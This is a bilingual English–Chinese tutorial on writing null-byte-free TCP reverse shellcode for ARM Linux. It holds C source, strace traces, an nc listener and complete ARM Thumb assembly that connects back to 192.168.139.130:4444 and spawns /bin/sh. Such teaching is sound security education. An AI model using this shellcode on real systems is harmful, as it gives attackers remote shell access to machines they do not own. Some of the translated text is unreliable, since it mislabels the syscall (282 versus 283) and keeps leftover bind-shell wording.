In this tutorial, you will learn how to write TCP reverse shellcode that is free of null bytes. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in Arm assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:
在本教程中,您将学习如何编写没有空字节的TCP反向shellcode。如果您想从小处入手,可以先学习如何使用汇编编写一个简单的execve() shell,然后再深入到这个稍微更广泛的教程中。如果您需要回忆温习ARM汇编,请查看我的《ARM汇编基础教程系列》,或使用此备忘表:
Before we start, I’d like to remind you that you’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?
在我们开始之前,我想提醒您,我们正在创建arm shellcode,因此如果您还没有arm lab环境,就需要建立一个arm lab环境。您可以自行搭建(QEMU模拟器搭建的树莓PI),或者节省时间并下载我创建的现成的实验室虚拟机(arm lab vm)。你准备好了吗?
First of all, what is a reverse shell and how does it really work? Reverse shells force an internal system to actively connect out to an external system. In that case, you machine has a listener port on which it receives the connection back from the target system.
首先,什么是reverse shell,它究竟是如何工作的?reverse shell强制内部系统主动连接到外部系统。在这种情况下,您的机器有一个监听端口,用它来接受来自目标系统的反向连接
Since it is more common that the firewall of the target network fails to block outgoing connections, one can take advantage of this misconfiguration by using a reverse shell (as opposed to a bind shell, which requires incoming connections to be allowed on the target system).
由于更常见的情况是目标网络的防火墙无法阻止向外部发出的连接,因此你可以利用这种错误配置,使用reverse shell(而不是bind shell,它要求目标系统上允许外部的传入连接)
This is the C code we will use for our translation.这是即将被转译的C代码
#include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> int main(void) { int sockfd; // socket file descriptor 套接字文件描述符 socklen_t socklen; // socket-length for new connections 新的连接的套接字长度 struct sockaddr_in addr; // client address 客户端地址 addr.sin_family = AF_INET; // server socket type address family = internet protocol address //服务端套接字类型 地址族 = IP地址 addr.sin_port = htons( 1337 ); // connect-back port, converted to network byte order //反向连接端口,转换成网络字节序 addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // connect-back ip , converted to network byte order //反向连接IP。转换成网络字节序 // create new TCP socket 创建一个新的TCP套接字 sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); // connect socket 连接套接字 connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)); // Duplicate file descriptors for STDIN, STDOUT and STDERR dup2(sockfd, 0); dup2(sockfd, 1); dup2(sockfd, 2); // spawn shell execve( "/bin/sh", NULL, NULL ); }
The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, connect, dup2, execve. You can figure out the system call numbers of these functions with the following command:
第一步是搞清楚必要的系统函数、他们的参数和系统调用号。查看上面的C代码,我们可以看到我们需要以下函数:socket、connect,、dup2、execve。您可以使用以下命令搞清楚这些函数对应的系统调用号:
pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket #define __NR_socketcall (__NR_SYSCALL_BASE+102) #define __NR_socket (__NR_SYSCALL_BASE+281) #define __NR_socketpair (__NR_SYSCALL_BASE+288) #undef __NR_socketcall
These are all the syscall numbers we’ll need:下面是我们需要的系统调用号
#define __NR_socket (__NR_SYSCALL_BASE+281) #define __NR_connect (__NR_SYSCALL_BASE+283) #define __NR_dup2 (__NR_SYSCALL_BASE+ 63) #define __NR_execve (__NR_SYSCALL_BASE+ 11)
The parameters each function expects can be looked up in the linux man pages, or on w3challs.com.
每个函数的参数可以通过linux手册和w3challs.com查询
The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful reverse shell connection using strace. Strace is a tool you can use to trace system calls and monitor interactions between processes and the Linux Kernel. Let’s use strace to test the C version of our bind shell. To reduce the noise, we limit the output to the functions we’re interested in.
下一步是搞清楚这些参数的具体值。一种方法是使用strace查看一个成功的reverse shell连接。strace是一个可以用来跟踪系统调用和监视进程与Linux内核之间的交互的工具。让我们使用strace测试bind shell的C语言版本。为了减少干扰,我们把输出限制在我们感兴趣的函数上。
Terminal 1: pi@raspberrypi:~/reverseshell $ gcc reverse.c -o reverse pi@raspberrypi:~/reverseshell $ strace -e execve,socket,connect,dup2 ./reverse
Terminal 2: user@ubuntu:~$ nc -lvvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from [192.168.139.130] port 4444 [tcp/*] accepted (family 2, sport 38010)
This is our strace output:这是strace的输出
pi@raspberrypi:~/reverseshell $ strace -e execve,socket,connect,dup2 ./reverse execve("./reverse", ["./reverse"], [/* 49 vars */]) = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.139.130")}, 16) = 0 dup2(3, 0) = 0 dup2(3, 1) = 1 dup2(3, 2) = 2 execve("/bin/sh", [0], [/* 0 vars */]) = 0
Now we can fill in the gaps and note down the values we’ll need to pass to the functions of our assembly bind shell.
现在我们可以填补空白,记下我们需要传给bind shell中函数的参数的具体值了(译者注:由于bind shell 和reverse shell 编写过程绝大多数是相同的,所以这里作者直接把之前写的复制过来,还保留了bind shell字眼)
In the first stage, we answered the following questions to get everything we need for our assembly program:
1.Which functions do I need?
2.What are the system call numbers of these functions?
3.What are the parameters of these functions?
4.What are the values of these parameters?
阶段一中,我们会回答了以下问题,获得了我们汇编程序所需要的:
1. 需要哪些函数
2. 这些函数的系统调用号
3. 这些函数的参数是什么
4. 这些参数的具体值
This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:
1. Map out which register you want to use for which parameter
2. Figure out how to pass the required values to these registers
1. How to pass an immediate value to a register
2. How to nullify a register without directly moving a #0 into it (we need to avoid null-bytes in our code and must therefore find other ways to nullify a register or a value in memory)
3. How to make a register point to a region in memory which stores constants and strings
3. Use the right system call number to invoke the function and keep track of register content changes
1. Keep in mind that the result of a system call will land in r0, which means that in case you need to reuse the result of that function in another function, you need to save it into another register before invoking the function.
2. Example: sockfd = socket(2, 1, 0) – the result (sockfd) of the socket call will land in r0. This result is reused in other functions like dup2(sockid, 0), and should therefore be preserved in another register.
接下来的步骤是,运用这些知识并将其转换成汇编代码。将每个函数切分成单独的块(译者注:控制流里的块),并且重复下面的步骤:
1. 将寄存器和你想使用的参数建立一一映射关系
2. 搞清楚如何将所需要的值传给相应的寄存器
1. 如何传递立即数给寄存器
2. 如何在不降0传给寄存器的前提下,将寄存器清零(我们需要避免代码中的空字节,因此必须找到其他方法使寄存器或内存中的值清空)
3. 如何让寄存器指向一块存储了字符串和常量的内存区域
3. 使用正确的系统调用号来调用函数,并能持续跟踪寄存器内容的变化
1. 请记住,系统调用的结果会存放到R0,意味着如果你想重在另一个函数中重复利用一个函数的返回值,你需要在调用另一个函数前,将其妥善保管到另一个寄存器中
2. 示例:sockfd =socket(2,1,0)– socket调用的结果( host_sockid )放入R0中。此结果在其他函数如listen(host_sockid,2)中复用,因此应保存在另一个寄存器中。
The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In Arm mode, the instructions are 32-bit, in Thumb mode they are 16-bit. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4 byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register containing the address of the next instruction with the LSB set to one, which makes the processor switch to Thumb mode. It all boils down to the following two instructions.
你要做的第一件事就是切换到thumb模式来减少偶然出现的空字节。在ARM模式下,指令是32位的,在Thumb模式下是16位的。这意味着我们可以通过简单地减少指令的大小来减少出现空字节的机会。简要回顾一下如何切换到Thumb模式:ARM指令必须是4字节对齐的,要将模式从ARM更改为Thumb,请将下一条指令地址(在PC中找到)的LSB(最低有效位)设置为1,方法是通过PC寄存器自增1,然后保存到另一个寄存器。然后使用bx(branch and exchange)指令分支到另一个寄存器,该寄存器包含LSB设置为1的下一条指令的地址(译者注:就是说,这个寄存器要保存下一条指令的地址加1的值),从而使处理器切换到Thumb模式。以上操作可归结为以下两条指令:
.section .text .global _start _start: .ARM add r3, pc, #1 bx r3
From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.从这里开始编写thumb代码,因此需要在你的代码中用.THUMB来标识这一情况
These are the values we need for the socket call parameters:
以下是我们socket函数需要调用的参数的值
root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/ /usr/include/linux/in.h: IPPROTO_IP = 0, // Dummy protocol for TCP // TCP的虚拟协议 /usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1, // Sequenced, reliable, connection-based /usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2 // IP protocol family. /usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET
After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our sockid and will end up in r0. Since we need sockid later on, let’s save it to r4.
In ARMv7+ you can use the movw instruction and put any immediate value into a register. In ARMv6, you can’t simply move any immediate value into a register and must split it into two smaller values. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).
To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.
设置参数后,使用svc指令调用系统调用socket。这个调用的结果将是我们的host_sockid,并将以存入R0结束。因为我们稍后需要host_sockid,我们把它保存到R4。
在ARMv7+模式中,你可以使用movw指令将任意立即数放入寄存器中,在ARM v6中, 你不能简单地将任意立即数放入寄存器而是必须将它分解成两个更小的值,如果你对这个细节感兴趣,可以参考内存指令长街的这个小节(在最后)
为了检验能否使用某个立即数,我写了一个小脚本(很烂,你不许看)叫rotator.py.
pi@raspberrypi:~ $ python rotator.py Enter the value you want to check: 281 Sorry, 281 cannot be used as an immediate number and has to be split. pi@raspberrypi:~ $ python rotator.py Enter the value you want to check: 200 The number 200 can be used as a valid immediate number. 50 ror 30 --> 200 pi@raspberrypi:~ $ python rotator.py Enter the value you want to check: 81 The number 81 can be used as a valid immediate number. 81 ror 0 --> 81
Final code snippet (ARMv6 version):代码最终版本(ARMv6)
.THUMB mov r0, #2 mov r1, #1 sub r2, r2 mov r7, #200 add r7, #81 // r7 = 281 (socket syscall number) svc #1 // r0 = sockid value mov r4, r0 // save sockid in r4
With the first instruction, we put the address of a structure object (containing the address family, host port and host address) stored in the literal pool into R0. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:
使用第一条指令,我们将包含地址族、主机端口和主机地址的结构体对象存储在文字池中,并使用PC相对寻址引用该对象(大量关键代码在图片里)。文字池是一块存储了常量,字符串或偏移量的的同一节(因为文本池是代码的一部分)中的内存区域,您可以使用带标签的ADR指令,而不是手动计算PC相对偏移量。ADR指令可以接受PC相对寻址表达式,即一个带有可选的偏移量的标签,这个标签的地址是相对于PC标签的。比如
// connect(r0, &sockaddr, 16) adr r1, struct // pointer to struct [...] struct: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 192,168,139,130 // IP Address
In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. The STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00.
A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register.
The move instruction puts the length of the sockaddr struct (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 283 by simply adding 2 to it, because r7 already contains 281 from the last syscall.
在第一条指令中,我们让R1指向存储了:地址族AF_INET、要使用的本地端口号,以及IP地址值的一块内存区域。
Strb指令用x00取代了\x02\xff中的占位符xff ,进而将AF_INET 设置成 \x02\x00
strb指令将寄存器中的一个字节存储到经过计算的内存区域。语法[R1,#1]的意思是我们将R1作为基地址,立即数(#1)作为偏移量。但我们是如何知道(R2)存储的是空字节的呢?因为R2经过“sub r2, r2, r2”指令后因为寄存器被清空已经确信是0了。
move指令将sockaddr_结构体的长度(AF_INET为2个字节,PORT为2个字节,ipaddress为4个字节,padding为8个字节总共16字节)放入r2。然后,我们通过简单地给R7自增1来将R7设置为282,因为R7已经包含了上一次系统调用中的(系统调用号)281。
// connect(r0, &sockaddr, 16) adr r1, struct // pointer to struct 指向结构体 strb r2, [r1, #1] // write 0 for AF_INET mov r2, #16 // struct length 结构体长度 add r7, #2 // r7 = 281+2 = 283 (bind syscall number) svc #1
The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.
Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.
我们在本例中使用的execve()函数和编写ARM shellcode教程中都遵循相同的处理流程,后者已经一步一步详细解释了。
最终,我们将AF_INET(带有0xff,将被一个空值替换),端口号,IP地址和“/bin/shX”(X字符会被替换成空)字符串附加到汇编代码的末尾
struct_addr: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 192,168,139,130 // IP Address binsh: .ascii "/bin/shX"
.section .text .global _start _start: .ARM add r3, pc, #1 // switch to thumb mode bx r3 .THUMB // socket(2, 1, 0) mov r0, #2 mov r1, #1 sub r2, r2 mov r7, #200 add r7, #81 // r7 = 281 (socket) svc #1 // r0 = resultant sockfd mov r4, r0 // save sockfd in r4 // connect(r0, &sockaddr, 16) adr r1, struct // pointer to address, port strb r2, [r1, #1] // write 0 for AF_INET mov r2, #16 add r7, #2 // r7 = 283 (connect) svc #1 // dup2(sockfd, 0) mov r7, #63 // r7 = 63 (dup2) mov r0, r4 // r4 is the saved sockfd sub r1, r1 // r1 = 0 (stdin) svc #1 // dup2(sockfd, 1) mov r0, r4 // r4 is the saved sockfd mov r1, #1 // r1 = 1 (stdout) svc #1 // dup2(sockfd, 2) mov r0, r4 // r4 is the saved sockfd mov r1, #2 // r1 = 2 (stderr) svc #1 // execve("/bin/sh", 0, 0) adr r0, binsh sub r2, r2 sub r1, r1 strb r2, [r0, #7] mov r7, #11 // r7 = 11 (execve) svc #1 struct: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 192,168,139,130 // IP Address binsh: .ascii "/bin/shX"